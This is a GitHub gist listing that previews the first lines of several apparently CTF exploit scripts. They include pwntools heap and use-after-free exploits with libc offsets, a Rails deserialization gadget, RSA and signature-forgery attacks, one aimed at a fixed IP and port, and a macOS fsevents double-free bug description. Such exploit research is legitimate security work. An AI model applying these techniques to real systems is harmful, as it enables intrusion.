View gist:b5280bc856bfc94157b760eb962e7b60
#!/usr/bin/env python | |
#-*- coding: utf-8 -*- | |
from pwn import * | |
import re | |
import sys | |
import string | |
import itertools | |
# UAF in IndexCursor |
View railspwn.rb
require 'yaml' | |
require 'base64' | |
require 'erb' | |
class ActiveSupport | |
class Deprecation | |
def initialize() | |
@silenced = true | |
end | |
class DeprecatedInstanceVariableProxy |
View gracias.py
from sage.all import continued_fraction, Integer, inverse_mod | |
pubkey = (1696852658826990842058316561963467335977986730245296081842693913454799128341723605666024757923000936875008280288574503060506225324560725525210728761064310034604441130912702077320696660565727540525259413564999213382434231194132697630244074950529107794905761549606578049632101483460345878198682237227139704889943489709170676301481918176902970896183163611197618458670928730764124354693594769219086662173889094843054787693685403229558143793832013288487194871165461567L, 814161885590044357190593282132583612817366020133424034468187008267919006610450334193936389251944312061685926620628676079561886595567219325737685515818965422518820810326234612624290774570873983198113409686391355443155606621049101005048872030700143084978689888823664771959905075795440800042648923901406744546140059930315752131296763893979780940230041254506456283030727953969468933552050776243515721233426119581636614777596169466339421956338478341355508343072697451L, 17101222758731850777 |
View handicraft.py
from sage.all import * | |
import base64 | |
def factor(n,b): | |
M=1 | |
print 'start' | |
a = 2 | |
i=0 | |
for q in primes(b): | |
i+=1 |
View gracias.py
from sage.all import continued_fraction, Integer, inverse_mod | |
pubkey = (1696852658826990842058316561963467335977986730245296081842693913454799128341723605666024757923000936875008280288574503060506225324560725525210728761064310034604441130912702077320696660565727540525259413564999213382434231194132697630244074950529107794905761549606578049632101483460345878198682237227139704889943489709170676301481918176902970896183163611197618458670928730764124354693594769219086662173889094843054787693685403229558143793832013288487194871165461567L, 814161885590044357190593282132583612817366020133424034468187008267919006610450334193936389251944312061685926620628676079561886595567219325737685515818965422518820810326234612624290774570873983198113409686391355443155606621049101005048872030700143084978689888823664771959905075795440800042648923901406744546140059930315752131296763893979780940230041254506456283030727953969468933552050776243515721233426119581636614777596169466339421956338478341355508343072697451L, 17101222758731850777 |
View ctfzone_pwn.py
# First stage: unsafe unlink | |
# Second stage (via a tunnel through a ROP chain): fastbin free pointer corruption | |
from pwn import * | |
import struct | |
import sys | |
offset_close = 0x00000000000f78b0 | |
offset_env = 0x3c6f38 |
View sigserver.py
# Implementation based on attack from | |
# http://www.hpl.hp.com/techreports/1999/HPL-1999-90.pdf | |
import socket | |
import telnetlib | |
import random | |
from hashlib import sha1 | |
from sage.all import inverse_mod, matrix, vector | |
TARGET = ('185.143.173.36', 1337) | |
sock=socket.create_connection(TARGET) |
View gist:416b333cb973812b39c085a42f5c19c4
The `FSEVENTS_DEVICE_FILTER_64` command of the fsevents device's `ioctl` handler has a race condition that can lead to a double `free` when the user updates the number of devices to 0.
static int | |
fseventsf_ioctl(struct fileproc *fp, u_long cmd, caddr_t data, vfs_context_t ctx) | |
{ | |
fsevent_handle *fseh = (struct fsevent_handle *)fp->f_fglob->fg_data; | |
int ret = 0; | |
fsevent_dev_filter_args64 *devfilt_args, _devfilt_args; | |
OSAddAtomic(1, &fseh->active); |
View robot_pwnage.py
import time | |
# https://github.com/niklasb/ctf-tools/blob/master/pwnlib/tools.py | |
from pwnlib.tools import * | |
TARGET=('localhost',5000) | |
INTERVAL=0 | |
offset_free = 549184 | |
offset_system = 0x456d0 |
View baby.py
import socket | |
import telnetlib | |
import time | |
import struct | |
import sys | |
TARGET=('localhost', 1337) | |
offset___libc_start_main_ret = 0x203f1 | |
offset_system = 0x00000000000456d0 |